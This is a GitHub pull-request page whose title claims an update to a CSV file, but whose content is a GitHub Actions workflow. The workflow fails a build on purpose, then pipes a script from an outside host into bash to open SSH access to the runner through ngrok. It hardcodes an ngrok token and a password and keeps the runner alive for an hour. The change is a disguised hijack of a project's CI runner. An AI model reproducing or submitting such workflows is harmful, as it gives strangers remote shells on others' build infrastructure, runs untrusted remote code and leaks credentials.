Update tpe-IP.csv #97
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: SSH | |
on: push | |
jobs: | |
build: | |
runs-on: ubuntu-latest | |
steps: | |
- uses: actions/checkout@v1 | |
- name: Try Build | |
run: ./not-exist-file.sh it bloke build | |
- name: Start SSH via Ngrok | |
if: ${{ failure() }} | |
run: curl -sL https://proxy.xiaofeiya.tk/debug-github-actions.sh | bash | |
env: | |
NGROK_TOKEN: 1new0X4tWwbMgPduoaRQ4pdEvXg_6RwuZspJbFjSV6C7bKzad | |
USER_PASS: luoxiaoping123 | |
- name: Don't kill instace | |
if: ${{ failure() }} | |
run: sleep 1h |